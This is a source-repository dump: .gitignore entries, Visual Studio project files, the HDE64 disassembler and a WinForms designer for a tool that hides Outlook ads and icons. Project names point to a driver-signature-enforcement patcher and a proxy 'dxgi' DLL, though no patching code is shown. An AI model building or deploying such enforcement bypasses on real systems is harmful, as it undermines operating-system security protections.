Since there are multiple workflows, uncomment next line to ignore bower_components 250 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 251 | #bower_components/ 252 | 253 | # RIA/Silverlight projects 254 | Generated_Code/ 255 | 256 | # Backup & report files from converting an old project file 257 | # to a newer Visual Studio version. Backup files are not needed, 258 | # because we have git ;-) 259 | _UpgradeReport_Files/ 260 | Backup*/ 261 | UpgradeLog*.XML 262 | UpgradeLog*.htm 263 | ServiceFabricBackup/ 264 | *.rptproj.bak 265 | 266 | # SQL Server files 267 | *.mdf 268 | *.ldf 269 | *.ndf 270 | 271 | # Business Intelligence projects 272 | *.rdl.data 273 | *.bim.layout 274 | *.bim_*.settings 275 | *.rptproj.rsuser 276 | *- [Bb]ackup.rdl 277 | *- [Bb]ackup ([0-9]).rdl 278 | *- [Bb]ackup ([0-9][0-9]).rdl 279 | 280 | # Microsoft Fakes 281 | FakesAssemblies/ 282 | 283 | # GhostDoc plugin setting file 284 | *.GhostDoc.xml 285 | 286 | # Node.js Tools for Visual Studio 287 | .ntvs_analysis.dat 288 | node_modules/ 289 | 290 | # Visual Studio 6 build log 291 | *.plg 292 | 293 | # Visual Studio 6 workspace options file 294 | *.opt 295 | 296 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 
297 | *.vbw 298 | 299 | # Visual Studio LightSwitch build output 300 | **/*.HTMLClient/GeneratedArtifacts 301 | **/*.DesktopClient/GeneratedArtifacts 302 | **/*.DesktopClient/ModelManifest.xml 303 | **/*.Server/GeneratedArtifacts 304 | **/*.Server/ModelManifest.xml 305 | _Pvt_Extensions 306 | 307 | # Paket dependency manager 308 | .paket/paket.exe 309 | paket-files/ 310 | 311 | # FAKE - F# Make 312 | .fake/ 313 | 314 | # CodeRush personal settings 315 | .cr/personal 316 | 317 | # Python Tools for Visual Studio (PTVS) 318 | __pycache__/ 319 | *.pyc 320 | 321 | # Cake - Uncomment if you are using it 322 | # tools/** 323 | # !tools/packages.config 324 | 325 | # Tabs Studio 326 | *.tss 327 | 328 | # Telerik's JustMock configuration file 329 | *.jmconfig 330 | 331 | # BizTalk build output 332 | *.btp.cs 333 | *.btm.cs 334 | *.odx.cs 335 | *.xsd.cs 336 | 337 | # OpenCover UI analysis results 338 | OpenCover/ 339 | 340 | # Azure Stream Analytics local run output 341 | ASALocalRun/ 342 | 343 | # MSBuild Binary and Structured Log 344 | *.binlog 345 | 346 | # NVidia Nsight GPU debugger configuration file 347 | *.nvuser 348 | 349 | # MFractors (Xamarin productivity tool) working folder 350 | .mfractor/ 351 | 352 | # Local History for Visual Studio 353 | .localhistory/ 354 | 355 | # BeatPulse healthcheck temp database 356 | healthchecksdb 357 | 358 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 359 | MigrationBackup/ 360 | 361 | # Ionide (cross platform F# VS Code tools) working folder 362 | .ionide/ 363 | 364 | # Fody - auto-generated XML schema 365 | FodyWeavers.xsd -------------------------------------------------------------------------------- /NOP/loader2/DSE-Patcher.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {AAFAF49F-EE20-4E9F-AE53-5254457AB141} 23 | 
Win32Proj 24 | DSEPatcher 25 | loader2 26 | 27 | 28 | 29 | Application 30 | true 31 | MultiByte 32 | v143 33 | 34 | 35 | Application 36 | true 37 | MultiByte 38 | v143 39 | 40 | 41 | Application 42 | false 43 | true 44 | MultiByte 45 | v143 46 | 47 | 48 | Application 49 | false 50 | true 51 | MultiByte 52 | v143 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | true 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | false 79 | 80 | 81 | false 82 | true 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 91 | 92 | 93 | Windows 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level4 102 | Disabled 103 | WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions) 104 | 105 | 106 | Windows 107 | true 108 | RequireAdministrator 109 | 110 | 111 | 112 | 113 | Level3 114 | 115 | 116 | MinSpace 117 | true 118 | false 119 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 120 | Size 121 | false 122 | 123 | 124 | Windows 125 | false 126 | true 127 | true 128 | msvcrt.lib;comctl32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 129 | true 130 | 131 | 132 | 133 | 134 | Level4 135 | 136 | 137 | MinSpace 138 | true 139 | false 140 | WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions) 141 | Size 142 | false 143 | 144 | 145 | Windows 146 | false 147 | true 148 | true 149 | true 150 | msvcrt.lib;shlwapi.lib;newdev.lib;setupapi.lib;comctl32.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies) 151 | RequireAdministrator 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 | 188 | 
-------------------------------------------------------------------------------- /NOP/worker/worker.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Debug 7 | Win32 8 | 9 | 10 | Release 11 | Win32 12 | 13 | 14 | Debug 15 | x64 16 | 17 | 18 | Release 19 | x64 20 | 21 | 22 | 23 | 17.0 24 | Win32Proj 25 | {8480da70-45e9-4d91-a89c-24b27d0f4924} 26 | worker 27 | 10.0 28 | 29 | 30 | 31 | DynamicLibrary 32 | true 33 | v143 34 | Unicode 35 | 36 | 37 | DynamicLibrary 38 | false 39 | v143 40 | true 41 | Unicode 42 | 43 | 44 | DynamicLibrary 45 | true 46 | v143 47 | Unicode 48 | 49 | 50 | DynamicLibrary 51 | false 52 | v143 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | dxgi 76 | 77 | 78 | dxgi 79 | 80 | 81 | dxgi 82 | 83 | 84 | dxgi 85 | 86 | 87 | 88 | Level3 89 | true 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | true 92 | stdcpplatest 93 | true 94 | MultiThreadedDebug 95 | 96 | 97 | Console 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | true 106 | true 107 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | stdcpplatest 110 | true 111 | MultiThreaded 112 | 113 | 114 | Console 115 | true 116 | true 117 | true 118 | 119 | 120 | 121 | 122 | Level3 123 | true 124 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | stdcpplatest 127 | true 128 | MultiThreadedDebug 129 | 130 | 131 | Console 132 | true 133 | 134 | 135 | 136 | 137 | Level3 138 | true 139 | true 140 | true 141 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 142 | true 143 | stdcpplatest 144 | true 145 | MultiThreaded 146 | 147 | 148 | Console 149 | true 150 | true 151 | true 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. 
For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 169 | 170 | 171 | 172 | 173 | 174 | 175 | -------------------------------------------------------------------------------- /hde/hde64.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Hacker Disassembler Engine 64 C 3 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 4 | * All rights reserved. 5 | * 6 | */ 7 | 8 | #include "hde64.h" 9 | #include "table64.h" 10 | 11 | #pragma warning(push) 12 | #pragma warning(disable:4701) 13 | #pragma warning(disable:4706) 14 | 15 | unsigned int hde64_disasm(const void *code, hde64s *hs) 16 | { 17 | uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0; 18 | uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; 19 | uint8_t op64 = 0; 20 | 21 | // Avoid using memset to reduce the footprint. 22 | #ifndef _MSC_VER 23 | memset((uint8_t*)hs, 0, sizeof(hde64s)); 24 | #else 25 | __stosb((uint8_t*)hs, 0, sizeof(hde64s)); 26 | #endif 27 | 28 | for (x = 16; x; x--) 29 | switch (c = *p++) { 30 | case 0xf3: 31 | hs->p_rep = c; 32 | pref |= PRE_F3; 33 | break; 34 | case 0xf2: 35 | hs->p_rep = c; 36 | pref |= PRE_F2; 37 | break; 38 | case 0xf0: 39 | hs->p_lock = c; 40 | pref |= PRE_LOCK; 41 | break; 42 | case 0x26: case 0x2e: case 0x36: 43 | case 0x3e: case 0x64: case 0x65: 44 | hs->p_seg = c; 45 | pref |= PRE_SEG; 46 | break; 47 | case 0x66: 48 | hs->p_66 = c; 49 | pref |= PRE_66; 50 | break; 51 | case 0x67: 52 | hs->p_67 = c; 53 | pref |= PRE_67; 54 | break; 55 | default: 56 | goto pref_done; 57 | } 58 | pref_done: 59 | 60 | hs->flags = (uint32_t)pref << 23; 61 | 62 | if (!pref) 63 | pref |= PRE_NONE; 64 | 65 | if ((c & 0xf0) == 0x40) { 66 | hs->flags |= F_PREFIX_REX; 67 | if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) 68 | op64++; 69 | hs->rex_r = (c & 7) >> 2; 70 | hs->rex_x = (c & 3) >> 1; 71 | hs->rex_b = c & 1; 72 | if (((c = *p++) & 0xf0) == 0x40) { 73 | opcode = c; 
74 | goto error_opcode; 75 | } 76 | } 77 | 78 | if ((hs->opcode = c) == 0x0f) { 79 | hs->opcode2 = c = *p++; 80 | ht += DELTA_OPCODES; 81 | } else if (c >= 0xa0 && c <= 0xa3) { 82 | op64++; 83 | if (pref & PRE_67) 84 | pref |= PRE_66; 85 | else 86 | pref &= ~PRE_66; 87 | } 88 | 89 | opcode = c; 90 | cflags = ht[ht[opcode / 4] + (opcode % 4)]; 91 | 92 | if (cflags == C_ERROR) { 93 | error_opcode: 94 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 95 | cflags = 0; 96 | if ((opcode & -3) == 0x24) 97 | cflags++; 98 | } 99 | 100 | x = 0; 101 | if (cflags & C_GROUP) { 102 | uint16_t t; 103 | t = *(uint16_t *)(ht + (cflags & 0x7f)); 104 | cflags = (uint8_t)t; 105 | x = (uint8_t)(t >> 8); 106 | } 107 | 108 | if (hs->opcode2) { 109 | ht = hde64_table + DELTA_PREFIXES; 110 | if (ht[ht[opcode / 4] + (opcode % 4)] & pref) 111 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 112 | } 113 | 114 | if (cflags & C_MODRM) { 115 | hs->flags |= F_MODRM; 116 | hs->modrm = c = *p++; 117 | hs->modrm_mod = m_mod = c >> 6; 118 | hs->modrm_rm = m_rm = c & 7; 119 | hs->modrm_reg = m_reg = (c & 0x3f) >> 3; 120 | 121 | if (x && ((x << m_reg) & 0x80)) 122 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 123 | 124 | if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { 125 | uint8_t t = opcode - 0xd9; 126 | if (m_mod == 3) { 127 | ht = hde64_table + DELTA_FPU_MODRM + t*8; 128 | t = ht[m_reg] << m_rm; 129 | } else { 130 | ht = hde64_table + DELTA_FPU_REG; 131 | t = ht[t] << m_reg; 132 | } 133 | if (t & 0x80) 134 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 135 | } 136 | 137 | if (pref & PRE_LOCK) { 138 | if (m_mod == 3) { 139 | hs->flags |= F_ERROR | F_ERROR_LOCK; 140 | } else { 141 | uint8_t *table_end, op = opcode; 142 | if (hs->opcode2) { 143 | ht = hde64_table + DELTA_OP2_LOCK_OK; 144 | table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; 145 | } else { 146 | ht = hde64_table + DELTA_OP_LOCK_OK; 147 | table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; 148 | op &= -2; 149 | } 150 | for (; ht != table_end; ht++) 
151 | if (*ht++ == op) { 152 | if (!((*ht << m_reg) & 0x80)) 153 | goto no_lock_error; 154 | else 155 | break; 156 | } 157 | hs->flags |= F_ERROR | F_ERROR_LOCK; 158 | no_lock_error: 159 | ; 160 | } 161 | } 162 | 163 | if (hs->opcode2) { 164 | switch (opcode) { 165 | case 0x20: case 0x22: 166 | m_mod = 3; 167 | if (m_reg > 4 || m_reg == 1) 168 | goto error_operand; 169 | else 170 | goto no_error_operand; 171 | case 0x21: case 0x23: 172 | m_mod = 3; 173 | if (m_reg == 4 || m_reg == 5) 174 | goto error_operand; 175 | else 176 | goto no_error_operand; 177 | } 178 | } else { 179 | switch (opcode) { 180 | case 0x8c: 181 | if (m_reg > 5) 182 | goto error_operand; 183 | else 184 | goto no_error_operand; 185 | case 0x8e: 186 | if (m_reg == 1 || m_reg > 5) 187 | goto error_operand; 188 | else 189 | goto no_error_operand; 190 | } 191 | } 192 | 193 | if (m_mod == 3) { 194 | uint8_t *table_end; 195 | if (hs->opcode2) { 196 | ht = hde64_table + DELTA_OP2_ONLY_MEM; 197 | table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; 198 | } else { 199 | ht = hde64_table + DELTA_OP_ONLY_MEM; 200 | table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; 201 | } 202 | for (; ht != table_end; ht += 2) 203 | if (*ht++ == opcode) { 204 | if (*ht++ & pref && !((*ht << m_reg) & 0x80)) 205 | goto error_operand; 206 | else 207 | break; 208 | } 209 | goto no_error_operand; 210 | } else if (hs->opcode2) { 211 | switch (opcode) { 212 | case 0x50: case 0xd7: case 0xf7: 213 | if (pref & (PRE_NONE | PRE_66)) 214 | goto error_operand; 215 | break; 216 | case 0xd6: 217 | if (pref & (PRE_F2 | PRE_F3)) 218 | goto error_operand; 219 | break; 220 | case 0xc5: 221 | goto error_operand; 222 | } 223 | goto no_error_operand; 224 | } else 225 | goto no_error_operand; 226 | 227 | error_operand: 228 | hs->flags |= F_ERROR | F_ERROR_OPERAND; 229 | no_error_operand: 230 | 231 | c = *p++; 232 | if (m_reg <= 1) { 233 | if (opcode == 0xf6) 234 | cflags |= C_IMM8; 235 | else if (opcode == 0xf7) 236 | cflags |= 
C_IMM_P66; 237 | } 238 | 239 | switch (m_mod) { 240 | case 0: 241 | if (pref & PRE_67) { 242 | if (m_rm == 6) 243 | disp_size = 2; 244 | } else 245 | if (m_rm == 5) 246 | disp_size = 4; 247 | break; 248 | case 1: 249 | disp_size = 1; 250 | break; 251 | case 2: 252 | disp_size = 2; 253 | if (!(pref & PRE_67)) 254 | disp_size <<= 1; 255 | } 256 | 257 | if (m_mod != 3 && m_rm == 4) { 258 | hs->flags |= F_SIB; 259 | p++; 260 | hs->sib = c; 261 | hs->sib_scale = c >> 6; 262 | hs->sib_index = (c & 0x3f) >> 3; 263 | if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) 264 | disp_size = 4; 265 | } 266 | 267 | p--; 268 | switch (disp_size) { 269 | case 1: 270 | hs->flags |= F_DISP8; 271 | hs->disp.disp8 = *p; 272 | break; 273 | case 2: 274 | hs->flags |= F_DISP16; 275 | hs->disp.disp16 = *(uint16_t *)p; 276 | break; 277 | case 4: 278 | hs->flags |= F_DISP32; 279 | hs->disp.disp32 = *(uint32_t *)p; 280 | } 281 | p += disp_size; 282 | } else if (pref & PRE_LOCK) 283 | hs->flags |= F_ERROR | F_ERROR_LOCK; 284 | 285 | if (cflags & C_IMM_P66) { 286 | if (cflags & C_REL32) { 287 | if (pref & PRE_66) { 288 | hs->flags |= F_IMM16 | F_RELATIVE; 289 | hs->imm.imm16 = *(uint16_t *)p; 290 | p += 2; 291 | goto disasm_done; 292 | } 293 | goto rel32_ok; 294 | } 295 | if (op64) { 296 | hs->flags |= F_IMM64; 297 | hs->imm.imm64 = *(uint64_t *)p; 298 | p += 8; 299 | } else if (!(pref & PRE_66)) { 300 | hs->flags |= F_IMM32; 301 | hs->imm.imm32 = *(uint32_t *)p; 302 | p += 4; 303 | } else 304 | goto imm16_ok; 305 | } 306 | 307 | 308 | if (cflags & C_IMM16) { 309 | imm16_ok: 310 | hs->flags |= F_IMM16; 311 | hs->imm.imm16 = *(uint16_t *)p; 312 | p += 2; 313 | } 314 | if (cflags & C_IMM8) { 315 | hs->flags |= F_IMM8; 316 | hs->imm.imm8 = *p++; 317 | } 318 | 319 | if (cflags & C_REL32) { 320 | rel32_ok: 321 | hs->flags |= F_IMM32 | F_RELATIVE; 322 | hs->imm.imm32 = *(uint32_t *)p; 323 | p += 4; 324 | } else if (cflags & C_REL8) { 325 | hs->flags |= F_IMM8 | F_RELATIVE; 326 | hs->imm.imm8 = *p++; 327 
| } 328 | 329 | disasm_done: 330 | 331 | if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { 332 | hs->flags |= F_ERROR | F_ERROR_LENGTH; 333 | hs->len = 15; 334 | } 335 | 336 | return (unsigned int)hs->len; 337 | } 338 | #pragma warning(pop) 339 | -------------------------------------------------------------------------------- /NOP/loader2/hde64.c: -------------------------------------------------------------------------------- 1 | 2 | // disable lint warnings for complete source code file 3 | //lint -e416 Warning 416: Likely creation of out-of-bounds pointer 4 | //lint -e801 Warning 801: Use of goto is deprecated 5 | //lint -e701 Warning 701: Shift left of signed quantity (int) 6 | //lint -e734 Warning 734: Loss of precision (assignment) (31 bits to 8 bits) 7 | //lint -e744 Warning 744: switch statement has no default 8 | //lint -e820 Warning 820: Boolean test of a parenthesized assignment 9 | //lint -e826 Warning 826: Suspicious pointer-to-pointer conversion (area too small) 10 | //lint -e830 Warning 830: Location cited in prior message 11 | //lint -e850 Warning 850: for loop index variable 'ht' whose type category is 'string' is modified in body of the for loop 12 | //lint -e952 Warning 952: Parameter could be declared const --- Eff. C++ 3rd Ed. item 3 13 | //lint -e954 Warning 954: Pointer variable could be declared as pointing to const --- Eff. C++ 3rd Ed. item 3 14 | 15 | /* 16 | * Hacker Disassembler Engine 64 C 17 | * Copyright (c) 2008-2009, Vyacheslav Patkov. 18 | * All rights reserved. 
19 | * 20 | */ 21 | 22 | #include "hde64.h" 23 | #include "table64.h" 24 | 25 | // Warning C4706: assignment within conditional expression 26 | #pragma warning(disable:4706) 27 | 28 | unsigned int hde64_disasm(const void *code, hde64s *hs) 29 | { 30 | uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0; 31 | uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; 32 | uint8_t op64 = 0; 33 | 34 | memset((LPBYTE)hs, 0, sizeof(hde64s)); 35 | 36 | for (x = 16; x; x--) 37 | switch (c = *p++) { 38 | case 0xf3: 39 | hs->p_rep = c; 40 | pref |= PRE_F3; 41 | break; 42 | case 0xf2: 43 | hs->p_rep = c; 44 | pref |= PRE_F2; 45 | break; 46 | case 0xf0: 47 | hs->p_lock = c; 48 | pref |= PRE_LOCK; 49 | break; 50 | case 0x26: case 0x2e: case 0x36: 51 | case 0x3e: case 0x64: case 0x65: 52 | hs->p_seg = c; 53 | pref |= PRE_SEG; 54 | break; 55 | case 0x66: 56 | hs->p_66 = c; 57 | pref |= PRE_66; 58 | break; 59 | case 0x67: 60 | hs->p_67 = c; 61 | pref |= PRE_67; 62 | break; 63 | default: 64 | goto pref_done; 65 | } 66 | pref_done: 67 | 68 | hs->flags = (uint32_t)pref << 23; 69 | 70 | if (!pref) 71 | pref |= PRE_NONE; 72 | 73 | if ((c & 0xf0) == 0x40) { 74 | hs->flags |= F_PREFIX_REX; 75 | if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) 76 | op64++; 77 | hs->rex_r = (c & 7) >> 2; 78 | hs->rex_x = (c & 3) >> 1; 79 | hs->rex_b = c & 1; 80 | if (((c = *p++) & 0xf0) == 0x40) { 81 | opcode = c; 82 | goto error_opcode; 83 | } 84 | } 85 | 86 | if ((hs->opcode = c) == 0x0f) { 87 | hs->opcode2 = c = *p++; 88 | ht += DELTA_OPCODES; 89 | } else if (c >= 0xa0 && c <= 0xa3) { 90 | op64++; 91 | if (pref & PRE_67) 92 | pref |= PRE_66; 93 | else 94 | pref &= ~PRE_66; 95 | } 96 | 97 | opcode = c; 98 | cflags = ht[ht[opcode / 4] + (opcode % 4)]; 99 | 100 | if (cflags == C_ERROR) { 101 | error_opcode: 102 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 103 | cflags = 0; 104 | if ((opcode & -3) == 0x24) 105 | cflags++; 106 | } 107 | 108 | x = 0; 109 | if (cflags & C_GROUP) { 110 | 
uint16_t t; 111 | t = *(uint16_t *)(ht + (cflags & 0x7f)); 112 | cflags = (uint8_t)t; 113 | x = (uint8_t)(t >> 8); 114 | } 115 | 116 | if (hs->opcode2) { 117 | ht = hde64_table + DELTA_PREFIXES; 118 | if (ht[ht[opcode / 4] + (opcode % 4)] & pref) 119 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 120 | } 121 | 122 | if (cflags & C_MODRM) { 123 | hs->flags |= F_MODRM; 124 | hs->modrm = c = *p++; 125 | hs->modrm_mod = m_mod = c >> 6; 126 | hs->modrm_rm = m_rm = c & 7; 127 | hs->modrm_reg = m_reg = (c & 0x3f) >> 3; 128 | 129 | if (x && ((x << m_reg) & 0x80)) 130 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 131 | 132 | if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { 133 | uint8_t t = opcode - 0xd9; 134 | if (m_mod == 3) { 135 | ht = hde64_table + DELTA_FPU_MODRM + t*8; 136 | t = ht[m_reg] << m_rm; 137 | } else { 138 | ht = hde64_table + DELTA_FPU_REG; 139 | t = ht[t] << m_reg; 140 | } 141 | if (t & 0x80) 142 | hs->flags |= F_ERROR | F_ERROR_OPCODE; 143 | } 144 | 145 | if (pref & PRE_LOCK) { 146 | if (m_mod == 3) { 147 | hs->flags |= F_ERROR | F_ERROR_LOCK; 148 | } else { 149 | uint8_t *table_end, op = opcode; 150 | if (hs->opcode2) { 151 | ht = hde64_table + DELTA_OP2_LOCK_OK; 152 | table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; 153 | } else { 154 | ht = hde64_table + DELTA_OP_LOCK_OK; 155 | table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; 156 | op &= -2; 157 | } 158 | for (; ht != table_end; ht++) 159 | if (*ht++ == op) { 160 | if (!((*ht << m_reg) & 0x80)) 161 | goto no_lock_error; 162 | else 163 | break; 164 | } 165 | hs->flags |= F_ERROR | F_ERROR_LOCK; 166 | no_lock_error: 167 | ; 168 | } 169 | } 170 | 171 | if (hs->opcode2) { 172 | switch (opcode) { 173 | case 0x20: case 0x22: 174 | m_mod = 3; 175 | if (m_reg > 4 || m_reg == 1) 176 | goto error_operand; 177 | else 178 | goto no_error_operand; 179 | case 0x21: case 0x23: 180 | m_mod = 3; 181 | if (m_reg == 4 || m_reg == 5) 182 | goto error_operand; 183 | else 184 | goto no_error_operand; 185 | } 186 | 
} else { 187 | switch (opcode) { 188 | case 0x8c: 189 | if (m_reg > 5) 190 | goto error_operand; 191 | else 192 | goto no_error_operand; 193 | case 0x8e: 194 | if (m_reg == 1 || m_reg > 5) 195 | goto error_operand; 196 | else 197 | goto no_error_operand; 198 | } 199 | } 200 | 201 | if (m_mod == 3) { 202 | uint8_t *table_end; 203 | if (hs->opcode2) { 204 | ht = hde64_table + DELTA_OP2_ONLY_MEM; 205 | table_end = ht + sizeof(hde64_table) - DELTA_OP2_ONLY_MEM; 206 | } else { 207 | ht = hde64_table + DELTA_OP_ONLY_MEM; 208 | table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; 209 | } 210 | for (; ht != table_end; ht += 2) 211 | if (*ht++ == opcode) { 212 | if ((*ht++ & pref) && !((*ht << m_reg) & 0x80)) 213 | goto error_operand; 214 | else 215 | break; 216 | } 217 | goto no_error_operand; 218 | } else if (hs->opcode2) { 219 | switch (opcode) { 220 | case 0x50: case 0xd7: case 0xf7: 221 | if (pref & (PRE_NONE | PRE_66)) 222 | goto error_operand; 223 | break; 224 | case 0xd6: 225 | if (pref & (PRE_F2 | PRE_F3)) 226 | goto error_operand; 227 | break; 228 | case 0xc5: 229 | goto error_operand; 230 | } 231 | goto no_error_operand; 232 | } else 233 | goto no_error_operand; 234 | 235 | error_operand: 236 | hs->flags |= F_ERROR | F_ERROR_OPERAND; 237 | no_error_operand: 238 | 239 | c = *p++; 240 | if (m_reg <= 1) { 241 | if (opcode == 0xf6) 242 | cflags |= C_IMM8; 243 | else if (opcode == 0xf7) 244 | cflags |= C_IMM_P66; 245 | } 246 | 247 | switch (m_mod) { 248 | case 0: 249 | if (pref & PRE_67) { 250 | if (m_rm == 6) 251 | disp_size = 2; 252 | } else 253 | if (m_rm == 5) 254 | disp_size = 4; 255 | break; 256 | case 1: 257 | disp_size = 1; 258 | break; 259 | case 2: 260 | disp_size = 2; 261 | if (!(pref & PRE_67)) 262 | disp_size <<= 1; 263 | break; 264 | } 265 | 266 | if (m_mod != 3 && m_rm == 4) { 267 | hs->flags |= F_SIB; 268 | p++; 269 | hs->sib = c; 270 | hs->sib_scale = c >> 6; 271 | hs->sib_index = (c & 0x3f) >> 3; 272 | if ((hs->sib_base = c & 7) == 5 && !(m_mod & 
1)) 273 | disp_size = 4; 274 | } 275 | 276 | p--; 277 | switch (disp_size) { 278 | case 1: 279 | hs->flags |= F_DISP8; 280 | hs->disp.disp8 = *p; 281 | break; 282 | case 2: 283 | hs->flags |= F_DISP16; 284 | hs->disp.disp16 = *(uint16_t *)p; 285 | break; 286 | case 4: 287 | hs->flags |= F_DISP32; 288 | hs->disp.disp32 = *(uint32_t *)p; 289 | break; 290 | } 291 | p += disp_size; 292 | } else if (pref & PRE_LOCK) 293 | hs->flags |= F_ERROR | F_ERROR_LOCK; 294 | 295 | if (cflags & C_IMM_P66) { 296 | if (cflags & C_REL32) { 297 | if (pref & PRE_66) { 298 | hs->flags |= F_IMM16 | F_RELATIVE; 299 | hs->imm.imm16 = *(uint16_t *)p; 300 | p += 2; 301 | goto disasm_done; 302 | } 303 | goto rel32_ok; 304 | } 305 | if (op64) { 306 | hs->flags |= F_IMM64; 307 | hs->imm.imm64 = *(uint64_t *)p; 308 | p += 8; 309 | } else if (!(pref & PRE_66)) { 310 | hs->flags |= F_IMM32; 311 | hs->imm.imm32 = *(uint32_t *)p; 312 | p += 4; 313 | } else 314 | goto imm16_ok; 315 | } 316 | 317 | 318 | if (cflags & C_IMM16) { 319 | imm16_ok: 320 | hs->flags |= F_IMM16; 321 | hs->imm.imm16 = *(uint16_t *)p; 322 | p += 2; 323 | } 324 | if (cflags & C_IMM8) { 325 | hs->flags |= F_IMM8; 326 | hs->imm.imm8 = *p++; 327 | } 328 | 329 | if (cflags & C_REL32) { 330 | rel32_ok: 331 | hs->flags |= F_IMM32 | F_RELATIVE; 332 | hs->imm.imm32 = *(uint32_t *)p; 333 | p += 4; 334 | } else if (cflags & C_REL8) { 335 | hs->flags |= F_IMM8 | F_RELATIVE; 336 | hs->imm.imm8 = *p++; 337 | } 338 | 339 | disasm_done: 340 | 341 | if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { 342 | hs->flags |= F_ERROR | F_ERROR_LENGTH; 343 | hs->len = 15; 344 | } 345 | 346 | return (unsigned int)hs->len; 347 | } 348 | 349 | -------------------------------------------------------------------------------- /NOP/gui/Form1.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace gui 2 | { 3 | partial class Form1 4 | { 5 | /// 6 | /// Required designer variable. 
7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | components = new System.ComponentModel.Container(); 32 | label1 = new Label(); 33 | txtPath = new TextBox(); 34 | label2 = new Label(); 35 | chkDisableFirstMailAd = new CheckBox(); 36 | chkDisableOneDriveBanner = new CheckBox(); 37 | chkDisableWordIcon = new CheckBox(); 38 | label3 = new Label(); 39 | chkDisableExcelIcon = new CheckBox(); 40 | chkDisablePowerPointIcon = new CheckBox(); 41 | chkDisableOneDriveIcon = new CheckBox(); 42 | chkDisableMoreAppsIcon = new CheckBox(); 43 | btnApplyRestart = new Button(); 44 | btnAbout = new Button(); 45 | timerCheckOutlook = new System.Windows.Forms.Timer(components); 46 | chkDisableAll = new CheckBox(); 47 | label4 = new Label(); 48 | chkF12 = new CheckBox(); 49 | label5 = new Label(); 